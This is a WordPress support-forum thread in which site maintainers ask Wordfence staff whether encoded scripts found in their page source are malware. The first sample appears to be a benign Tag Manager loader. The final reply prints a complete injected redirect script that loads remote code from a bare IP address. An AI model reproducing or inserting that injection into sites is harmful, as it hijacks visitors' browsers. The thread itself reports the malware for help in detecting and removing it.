Title: JavaScript virus injection Reason: encoded data:text/javascript Code
Last modified: September 28, 2021

---

# JavaScript virus injection Reason: encoded data:text/javascript Code

 *  Resolved [SRD75](https://wordpress.org/support/users/srd75/)
 * (@srd75)
 * [4 years, 7 months ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/)
 * Hi Folks,
 * [https://www.siteguarding.com/](https://www.siteguarding.com/) shows a number
   of alerts for my client’s website such as:
 * > JavaScript virus injection Reason: encoded data:text/javascript Code: script
   > src=”data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2go
 * In the source code I see:
 * `<script src="data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOm5ldyBEYXRlKCkuZ2V0VGltZSgpLGV2ZW50OidndG0uanMnfSk7dmFyIGY9ZC5nZXRFbGVtZW50c0J5VGFnTmFtZShzKVswXSxqPWQuY3JlYXRlRWxlbWVudChzKSxkbD1sIT0nZGF0YUxheWVyJz8nJmw9JytsOicnO2ouYXN5bmM9ITA7ai5zcmM9J2h0dHBzOi8vd3d3Lmdvb2dsZXRhZ21hbmFnZXIuY29tL2d0bS5qcz9pZD0nK2krZGw7Zi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShqLGYpfSkod2luZG93LGRvY3VtZW50LCdzY3JpcHQnLCdkYXRhTGF5ZXInLCdHVE0tUEIzTlJLOScp"
   defer></script>`
 * Wordfence is not detecting any of these.
 * I am not the developer of the website, I am doing maintenance.
 * Are these viruses?
 * Thanks,
    Steve
 * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fjavascript-virus-injection-reason-encoded-datatext-javascript-code%2F%3Foutput_format%3Dmd&locale=en_US)
   to see the link]_

Viewing 5 replies - 1 through 5 (of 5 total)

 *  Plugin Support [WFAdam](https://wordpress.org/support/users/wfadam/)
 * (@wfadam)
 * [4 years, 7 months ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/#post-14922031)
 * Hello [@srd75](https://wordpress.org/support/users/srd75/) and thanks for reaching
   out to us!
 * I am not familiar with siteguarding.com but I did check your site against VirusTotal.
   I did not find any issues on your site.
 * Could you do me a favor and run a High Sensitivity scan? You can do this by navigating
   to Wordfence > Scan > Manage Scan > High Sensitivity and then SAVE. Now head 
   back over to the Scan page and run the scan until it finishes.
 * Let me know if you find any results!
 * Thanks again!
 *  Thread Starter [SRD75](https://wordpress.org/support/users/srd75/)
 * (@srd75)
 * [4 years, 7 months ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/#post-14927954)
 * Hi Adam,
 * I’ve done that and no issues were found by Wordfence.
 * This does not mean that the injected script is gone, though.
 * It is still present in the source code of the home page when logged out of admin.
 * Cheers,
    Steve
 *  Moderator [tobifjellner (Tor-Bjorn “Tobi” Fjellner)](https://wordpress.org/support/users/tobifjellner/)
 * (@tobifjellner)
 * [4 years, 7 months ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/#post-14942820)
 * [@srd75](https://wordpress.org/support/users/srd75/) I removed your relative 
   empty comment from 20 minutes ago. For technical reasons, other users may not
   get a reminder when you post. And also: this is just a forum where people come
   and go. We see a lot of “abandoned topics” – if a good reply helped the original
   poster, they often never respond at all. And that’s OK, since these are not tickets…
 *  Plugin Support [WFAdam](https://wordpress.org/support/users/wfadam/)
 * (@wfadam)
 * [4 years, 7 months ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/#post-14963714)
 * [@srd75](https://wordpress.org/support/users/srd75/) I believe I have assisted
   you elsewhere. I will help you in your email.
 *  [David Goring](https://wordpress.org/support/users/dg12345/)
 * (@dg12345)
 * [4 years, 1 month ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/#post-15540215)
 * This doesn’t seem to be resolved
 * This was not detected on high Sensitivity scan
    `<!--codes_iframe--><script type
   ="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:
   ^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?
   decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs
   =",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=
   cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((
   new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires
   ="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script
   ><!--/codes_iframe-->`

Viewing 5 replies - 1 through 5 (of 5 total)

The topic ‘JavaScript virus injection Reason: encoded data:text/javascript Code’
is closed to new replies.

 * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865)
 * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordfence/)
 * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)

 * 5 replies
 * 4 participants
 * Last reply from: [David Goring](https://wordpress.org/support/users/dg12345/)
 * Last activity: [4 years, 1 month ago](https://wordpress.org/support/topic/javascript-virus-injection-reason-encoded-datatext-javascript-code/#post-15540215)
 * Status: resolved